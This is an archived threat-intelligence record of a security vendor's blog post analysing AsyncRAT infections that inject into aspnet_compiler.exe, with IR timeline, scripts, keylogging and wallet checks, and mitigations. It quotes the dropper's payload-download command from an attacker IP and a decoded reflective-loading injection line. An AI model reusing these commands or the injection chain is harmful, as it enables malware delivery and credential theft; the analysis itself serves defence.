{ "id": "e03b899e-f4a7-45c4-9a82-398407006d28", "created_at": "2026-04-06T01:29:08.985593Z", "updated_at": "2026-04-10T03:37:08.521248Z", "deleted_at": null, "sha1_hash": "c9393e6bb571fb81a77514becc39f8dbe58fe895", "title": "Analyzing AsyncRAT's Code Injection into Aspnet_Compiler.exe Across Multiple Incident Response Cases", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1658056, "plain_text": "Analyzing AsyncRAT's Code Injection into Aspnet_Compiler.exe Across\r\nMultiple Incident Response Cases\r\nBy Buddy Tancio, Fe Cureg, Maria Emreen Viray ( words)\r\nPublished: 2023-12-11 · Archived: 2026-04-06 01:02:02 UTC\r\nMalware\r\nThis blog entry delves into MxDR's unraveling of the AsyncRAT infection chain across multiple cases, shedding light on the\r\nmisuse of aspnet_compiler.exe, a legitimate Microsoft process originally designed for precompiling ASP.NET web\r\napplications.\r\nBy: Buddy Tancio, Fe Cureg, Maria Emreen Viray Dec 11, 2023 Read time: 11 min (2917 words)\r\nSave to Folio\r\nDuring our recent investigations, the Trend Micro Managed XDRservices (MxDR) team handled various cases involving\r\nAsyncRAT, a Remote Access Tool (RAT) with multiple capabilities, such as keylogging and remote desktop control, that\r\nmake it a substantial threat to victims. This blog entry delves into MxDR's unraveling of the AsyncRAT infection chain\r\nacross multiple cases, shedding light on the misuse of aspnet_compiler.exe, a legitimate Microsoft process originally\r\ndesigned for precompiling ASP.NET web applications. Malicious actors exploited this process to inject the AsyncRAT\r\npayload, showing evolving adversary tactics.\r\nEarlier this year, our internal Threat Hunting team also encountered ransomware infections that cleverly used AsyncRAT's\r\ncapabilities, with  tactics, techniques, and procedures (TTPs) resembling the ones we will discuss in this blog entry,\r\neffectively bypassing antivirus defenses. The attackers then employed reflective loading through the aspnet_compiler.exe\r\nprocess, allowing them to discretely deploy their payloads.\r\nVarious research studies have scrutinized AsyncRAT infections, revealing the adaptability of its operators in employing\r\ndifferent techniques. For instance, campaigns in 2019 and 2020 distributed modified versions of AsyncRAT with a Covid-19\r\ntheme, capitalizing on the pandemic during its early period. In another case, malicious actors impersonated local banks and\r\nlaw enforcement institutions to deliver AsyncRAT to their targets.\r\nIn 2021, AsyncRAT was part of a phishing campaign called Operation Spalax.  The phishing campaigns, which persisted\r\nuntil late 2021 and early 2022, employed HTML attachments for AsyncRAT delivery while also integrating reflective\r\nloading techniques. These incidents underline the malware's versatility and sustained use across diverse attack vectors.\r\nThe pivot point\r\nTime elapsed Activity\r\nT0 User downloaded the password-protected ZIP file downloadedFile_SSAfnmeddOFzc.zip\r\n1 minute and 20\r\nseconds\r\nUser extracted the ZIP file that contains a .wsf script\r\n1 minute and 26\r\nseconds\r\nThe first payload is downloaded and executed, leading to the download of the second payload\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 1 of 14\n\n1 minute and 35\r\nseconds\r\nAutostart is created\r\n1 minute and 59\r\nseconds\r\nThe second payload is downloaded and executed\r\n5 minutes and 48\r\nseconds\r\nProcess injection to aspnet_compiler.exe and command-and-control (C\u0026C) connection via\r\ndynamic DNS\r\nTable 1. Timeline of events\r\nOur investigation began with a workbench alert triggered by Trend Vision One’s Workbench, an application that showcases\r\nalerts triggered by detection models, enabling the MxDR team to assess and prioritize alerts for further investigation.\r\nFigure 1 depicts the detection of suspicious activity involving aspnet_compiler.exe, which attempted to establish a\r\nconnection with the external IP address 45[.]141[.]215[.]40. Simultaneously, our analysis reveals the execution of\r\nconcerning PowerShell scripts and a batch file in close proximity. We were able to use this data as a pivot point to backtrack\r\nand investigate the entry point of the file and its additional activities.\r\nWe discovered that the trigger for the infection was a file initially downloaded through Google Chrome named\r\ndownloadedFile_SSAfnmeddOFzc.zip.\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\r\nC:\\Users\\\u003cusername\u003e\\Downloads\\downloadedFile_SSAfnmeddOFzc.zip\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 2 of 14\n\nThe user then opened the ZIP file, which contained a script file named downloadedFile_SSAfnmedd.wsf. We collected the\r\nZIP file and found that it was password-protected.\r\nBased on recent reports, AsyncRAT typically arrives via spam mail. We strongly suspect that the user may have received a\r\npassword for decompressing the ZIP file, along with a malicious link. The user extracted and opened the file using the\r\npassword, highlighting a common tactic employed by threat actors to circumvent detection — using the included password\r\nin the email to extract ZIP files. \r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\Temp923a29cc-d4fd-4950-9b7d-801ff92f7bea_downloadedFile_SSAfnmeddOFzc.zip\\downloadedFile_SSAfnmeddOFzc.wsf\r\nExamining the execution profile reveals wscript.exe being initiated via Windows Explorer, suggesting that the user executed\r\nthe file by double-clicking it. The installation sequence involves the creation and execution of multiple PowerShell scripts\r\n(.ps1), VBScript (.vbs), and Batch files (.bat). \r\nBy using Antimalware Scan Interface (AMSI) telemetry (TELEMETRY_AMSI_EXECUTE), we gained insight into the data\r\nassociated with downloadedFile_SSAfnmeddOFzc.wsf in runtime, enabling us to discern the file's purpose and its\r\ncorresponding activities.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 3 of 14\n\nIHost.CreateObject(\"WScript.Shell\");|\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIHost.CreateObject(\"WScript.Shell\");\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIWshShell3.Run(\"powershell -command \"[xml]$xmldoc = Get-Content 'C:\\Users\\Public\\VLCdllFra\", \"0\", \"true\");\r\nIHost.CreateObject(\"WScript.Shell\");\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIWshShell3.Run(\"powershell -command \"[xml]$xmldoc = Get-Content 'C:\\Users\\Public\\VLCdllFra\", \"0\", \"true\");\r\nIFileSystem3.DeleteFile(\"C:\\Users\\Public\\VLCdllFrame.xml\");\r\nThe script downloadedFile_SSAfnmeddOFzc.wsf is a Windows Script File (.wsf), that uses a mix of PowerShell and\r\nVBScript commands to execute a series of actions. It creates a WScript.Shell object, commonly used for executing shell\r\ncommands, and generates a text file named VLCdllFrame.xml in the C:\\Users\\Public directory. The “true” value as the\r\nsecond parameter indicates that the file will be overwritten if it already exists.\r\nThe script uses the Start-BitsTransfer command to download a file from hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg, saving\r\nit as snakers.zip. Subsequently, it extracts the contents into either the C:\\Users\\Public directory or, in some cases into\r\n C:\\Users\\Public\\Pictures\\. Following the execution of the PowerShell command, the script deletes the previously created\r\nVLCdllFrame.xml file.\r\nWe collected snakers.zip and analyzed its contents, which revealed the presence of various malicious scripts, all integral\r\ncomponents of the AsyncRAT installation routine.\r\nComponent SHA256 hash Detection name\r\nC:\\Users\\Public\\Webcentral.vbs 50b6aaed93609360f33de4b40b764d3bb0bd45d1 Trojan.VBS.RUNNER.AOE\r\nC:\\Users\\Public\\Webcentral.bat f22cceb9c6d35c9119a5791d6fd93bf1484e6747 Trojan.BAT.POWRUN.AA\r\nC:\\Users\\Public\\hash.vbs 2226d90cce0e6f3e5f1c52668ed5b0e3a97332c1 Trojan.VBS.RUNNER.AOE\r\nC:\\Users\\Public\\hash.bat 8fe5c43704210d50082bbbaf735a475810a8dbc9 Trojan.BAT.POWRUN.AA\r\nC:\\Users\\Public\\Webcentral.ps1 7be69e00916c691bbbed6ff9616f974f90234862 Trojan.PS1.RUNNER.GBT\r\nC:\\Users\\Public\\runpe.txt c07b2c25f926550d804087ac663991cf06bac519 Trojan.Win32.ASYNCRAT.ENC\r\nC:\\Users\\Public\\msg.txt c5b16f22397c201a6e06f0049b6f948c648f11b7 Trojan.Win32.ASYNCRAT.ENC\r\nC:\\Users\\Public\\hash.ps1 899ca79e54a2d4af140a40a9ca0b2e03a98c46cb Trojan.PS1.ASYNCRAT.L\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 4 of 14\n\nTable 2. The components of the AsyncRAT installation routine\r\nFigure 4 depicts the execution profile generated by Vision One, illustrating the sequence of events in the AsyncRAT\r\ninstallation routine triggered when the user opened the file downloadedFile_SSAfnmeddOFzc.wsf.\r\nWe observed aspnet_compiler.exe establishing connections to the IP addresses 208[.]95[.]112[.]1:80 (ip-api[.]com) and\r\n45[.]141[.]215.40:4782 (httpswin10[.]kozow[.]com). The former is used for geolocation checks, while the latter —\r\nidentified as a free dynamic DNS — is likely employed by malicious actors to obfuscate their true server IP address,\r\nenabling quick changes to evade detection. In other cases, it was seen connecting to 66escobar181[.]ddns[.]net, another\r\ndynamic DNS server.\r\nScheduled tasks were created with the task names Reklam or Rekill, providing AsyncRAT persistence capabilities. Figure 6\r\nshows the contents of Webcentral.ps1, the script responsible for creating a scheduled task that executes\r\nC:\\Users\\Public\\hash.vbs or C:\\Users\\Public\\Pictures\\hash.vbs every two minutes using the Windows Task Scheduler\r\nservice.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 5 of 14\n\nAnalyzing the Scripts\r\nBy analyzing the scripts, we were able to gain deeper insights into the threat's objectives. The diagram shown in Figure 8\r\nillustrates how the threat strategically employs multiple layers of scripts as a means of evading detection. Subsequently, it\r\nproceeds to perform code injection into aspnet_compiler.exe, representing another method of staying undetected.\r\nIn this section, we will discuss the objectives of each script extracted from snakers.zip.\r\nThe script checks if it is running with administrative privileges using the net session command (line 9-10). If it succeeds, it\r\nflags the attacker that administrative rights are present (isAdmin), and then runs a command stored in the variable\r\nexecutionCommand, directing it to a batch file (C:\\Users\\Public\\Webcentral.bat). The script includes error-handling\r\ntechniques, using the On Error Resume Next and On Error GoTo 0 syntaxes to manage errors and keep the script running\r\nsmoothly.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 6 of 14\n\nThe Webcentral.bat script initiates a PowerShell execution of the script located at C:\\Users\\Public\\Webcentral.ps1. It\r\nemploys the -NoProfile, -WindowStyle Hidden, and -ExecutionPolicy Bypass parameters to run PowerShell in a hidden\r\nwindow with the bypassed execution policy.\r\nThe Webcentral.ps1 script creates a scheduled task named Reklam that runs a script (hash.vbs) every two minutes. The\r\nscheduled task is enabled and can start even if the device is running on batteries. The hash.vbs script, located in the\r\nC:\\Users\\Public\\hash.vbs directory, is executed as an action of the scheduled task. The task is registered using the Windows\r\nTask Scheduler service. \r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 7 of 14\n\nHash.vbs is the same script as Webcentral.vbs but directs to a different file (C:\\Users\\Public\\hash.bat).\r\nSimilar to Hash.vbs, Hash.bat is the script as Webscentral.bat but directs to a different file (C:\\Users\\Public\\hash.ps1).\r\nHash.ps1 decodes and loads portable executable (PE) files encoded in msg.txt and runpe.txt, triggering the execution of\r\naspnet_compiler.exe. It employs functions from the decoded runpe.txt to inject the AsyncRAT payload (the decoded msg.txt)\r\ninto the newly spawned aspnet_compiler.exe process.\r\nThe decoded script can be seen below:\r\n[System.Reflection.Assembly]::Load($decoded_runpe_payload).GetType('NewPE2.PE').GetMethod('Execute').'Invoke'.Invoke($nu\r\n[object[]]('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe', $decoded_msg_payload))\r\nThis is a PowerShell script that dynamically loads a .NET assembly, specifically the NewPE2.PE type, and invokes its\r\nExecute method. The Execute method is used for injecting code associated with aspnet_compiler.exe into the process. It is\r\ndesigned for malicious code injection, allowing malicious actors to execute additional code within the context of the\r\nlegitimate aspnet_compiler.exe process.\r\nThe decoded content of the runpe.txt file, seen in Figure 12, shows a look into the code used in the hash.ps1 script for\r\nexecuting process injection into aspnet_compiler.exe.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 8 of 14\n\nThe decoded config at the beginning of routine, notable values are the hostname 66escobar181[.]ddns[.]net and the port\r\nnumber 6666, which it connects to.\r\nOther capabilities\r\nThe AsyncRAT backdoor has other capabilities depending on the embedded configuration. This includes anti-debugging and\r\nanalysis checks, persistence installation, and keylogging. The code snippet in Figure 13 checks if keylogging is enabled in\r\nthe embedded configuration embeddedConfig. If keylogging is enabled, it starts a new thread to execute the startKeylogging\r\nmethod.\r\nFor the sample file that we acquired, only the keylogging routine was enabled, which captures and records every keystroke\r\nof the infected machine and sends the data to the attacker-controlled server. \r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 9 of 14\n\nThe keylogging routine ends with the logging key corresponding to the associated program (getActiveApplicationName()).\r\nThis interaction was found from a specified log file in the temporary directory. It then logs the information in\r\n%TEMP%\\Log.tmp\r\nThe code snippet dynamically selects a host and port from the configuration. AsyncRAT employs a socket connection to\r\ninteract with various IP addresses and ports, making its infrastructure dynamic and adaptable. It allows threat actors to\r\nchange server addresses frequently, complicating efforts to predict or block communication channels. Furthermore, the code\r\nincludes error-handling mechanisms: if there's an issue with connecting to a specific IP address or port, the error-handling\r\nmechanisms allow AsyncRAT to attempt alternative connections or fall back to default configurations, further emphasizing\r\nthe evasive tactics employed by the attackers. \r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 10 of 14\n\nThe AsyncRAT payload gathers client information as it connects to its server. This notably includes usernames, computer\r\ninformation, installed AV software and installed cryptocurrency wallets. \r\nAsyncRAT scans specific folders within the application directory, browser extensions, and user data to identify folder names\r\nassociated with particular crypto wallets, verifying their presence in the system.\r\nThe code snippet of the crypto wallet-checking prologue conducts queries for certain directories relating to the following\r\nwallet strings:\r\nAtomic\r\nBinance\r\nBinanceEdge\r\nBitcoinCore\r\nBitKeep\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 11 of 14\n\nBitPay\r\nCoinbase\r\nCoinomi\r\nElectrum\r\nExodus\r\nF2a\r\nLedgerLive\r\nMeta\r\nPhantom\r\nRabbyWallet\r\nRonin\r\nTronLink\r\nTrust\r\nRecent trends in AsyncRAT infections\r\nAs of early 2023, AsyncRAT infections still persist, employing various file types, including PowerShell, Windows Script\r\nFile (WSF), and VBScript (VBS) to bypass antivirus detection measures. Notably, Any.run consistently reports AsyncRAT\r\nranking among the top ten weekly malware trends over the past few months.\r\nOur recent investigations align with this trend, although there are nuanced differences in the dropped scripts, utilized\r\ndomains, and observed injection processes. Despite these changes in tactics, one consistent aspect is the use of dynamic\r\nDNS (DDNS) services — such as those provided by No-IP and DuckDNS — for network infrastructure.\r\nAnalyzing the decrypted AsyncRAT payload, it becomes evident that the certificate employed is associated with AsyncRAT\r\nServer, a characteristic trait of AsyncRAT C\u0026C traffic. Typically, the Subject Common Name is configured as either\r\n\"AsyncRAT Server\" or \"AsyncRAT Server CA,\" (as mentioned in our previous technical brief on SSL/TLS\r\ncommunications). Examining the Subject Common Name proves valuable in identifying AsyncRAT infections.\r\nThe malware configuration reveals the presence of the ID 3LOSH RAT. This implies that the payload may have utilized the\r\n3LOSH crypter for obfuscation and stealth, potentially explaining the use of multiple scripts across different stages of the\r\ninfection chain. The previous research from Talos showed similar instances where such infections leverage the elusiveness\r\nprovided by crypters to enhance operational efficiency.\r\nDuring our investigation of the AsyncRAT sample files, we identified code similarities between the injection code used for\r\naspnet_compiler.exe and an open-source repository on GitHub.  Two notable distinctions emerged between the AsyncRAT\r\nsample obtained from our customer's environment and the version on the GitHub repository. First, our acquired sample\r\nincludes BoolWallets as one of the scanned cryptocurrency wallets. Second, the GitHub version lacks keylogging\r\ncapabilities. The code we acquired, however, exhibits keylogging functionalities, resembling another sample found in the\r\nGitHub repository. These variances suggest that the attacker customized the GitHub code to align with their specific goals.\r\nExploring Dynamic DNS Usage\r\nDynamic DNS allows threat actors to swiftly change the IP address associated with a domain name, posing a challenge for\r\nsecurity systems attempting to detect and block malicious activities. Our recent investigations have unveiled C\u0026C domains\r\nregistered under No-IP and Dynu Systems, Inc. One domain, 66escobar181[.]ddns[.]net, resolved to the IP address\r\n185[.]150[.]25[.]181. VirusTotal analysis indicates multiple domains flagged as malicious, all converging to the same IP\r\naddress.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 12 of 14\n\nFurther scrutinizing the IP information, we find an association with the hosting provider Zap-Hosting, which is known for\r\noffering diverse services such as game servers, websites, and virtual private servers (VPS). A similar pattern emerges with\r\nthe other domain (httpswin10[.]kozow[.]com), which resolves to an IP address associated with a hosting provider. This IP\r\naddress is also shared with other malicious domains, indicating a consistent strategy by malicious actors to leverage DDNS\r\nand hosting providers for their operations. This underscores the deliberate efforts to obfuscate their activities and highlights\r\nthe persistent challenges in tracking and mitigating threats associated with AsyncRAT.\r\nConclusion and Recommendations\r\nThis blog entry shows how AsyncRAT, a remote access trojan with features such as unauthorized access, keylogging, remote\r\ndesktop control, and covert file manipulation, serves as a versatile tool for various threats, including ransomware.\r\nThe strategic use of multiple obfuscated scripts that incorporate \"living off the land\" techniques grant malicious actors\r\nflexibility, enabling them to evade detection. Coupled with code injection into legitimate files like aspnet_compiler.exe, this\r\ntechnique significantly increases the challenge of detecting these threats.\r\nFurthermore, the use of dynamic host servers allows threat actors to seamlessly update their IP addresses, strengthening their\r\nability to remain undetected within the system. AsyncRAT’s default purpose remains intact in many cases — to covertly\r\nexfiltrate valuable information such as usernames, passwords, and cryptocurrency wallets. Keystrokes captured via\r\nkeylogging enable attackers to harvest credentials and potentially access financial accounts.\r\nThis case highlights the significance of continuous monitoring services like Trend MxDRservices. The early detection of the\r\nAsyncRAT allowed the team to prevent it from causing additional harm to the customer’s environment, potentially avoiding\r\nransomware infection, a scenario AsyncRAT has historically been capable of in the past.\r\nHere are some mitigation and prevention strategies that an organization can employ for such attacks:\r\nBehavior monitoring observes the runtime behavior of scripts and other executable code. It analyzes actions taken by\r\nscripts during execution, identifying deviations from expected behavior.\r\nWeb reputation services maintain databases of known malicious URLs and domains. They assess the reputation of\r\nweb entities, preventing users from accessing sites associated with malicious scripts.\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 13 of 14\n\nRestricting or disabling the execution of VBScript and PowerShell scripts for specific users who don’t need this\r\nfunction can help limit an attacker’s ability to leverage scripts for malicious activities.\r\nGiven the persistent and evolving nature of threats like AsyncRAT, it is important to implement robust 24/7\r\nmonitoring services, such as MxDR, for proactive threat detection and prevention. The ability to promptly respond to\r\npotential breaches not only mitigates the impact on the targeted environment but also prevents the escalation of\r\nthreats, such as ransomware infections.\r\nImplementing robust email security measures can help in blocking AsyncRAT infections delivered through spam\r\nemails, preventing users from clicking on malicious links or downloading malicious files. Email security serves as an\r\nadditional data source for MxDR investigations, providing comprehensive visibility into the point of entry for the\r\nthreat. In this case, our customers lacked email security or were using third-party email security, hindering our ability\r\nto pinpoint the specific email message as the source.\r\nUsers should be taught about the risks of downloading and executing scripts from unknown or untrusted sources,\r\nespecially those that come bundled with email attachments and links.\r\n \r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be viewed here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nhttps://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html" ], "report_names": [ "analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html" ], "threat_actors": [ { "id": "64d750e4-67db-4461-bae2-6e75bfced852", "created_at": "2022-10-25T16:07:24.01415Z", "updated_at": "2026-04-10T02:00:04.839502Z", "deleted_at": null, "main_name": "Operation Spalax", "aliases": [], "source_name": "ETDA:Operation Spalax", "tools": [ "AsyncRAT", "Bladabindi", "Jorik", "Remcos", "RemcosRAT", "Remvio", "Socmer", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775438948, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.pdf", "text": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.txt", "img": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.jpg" } }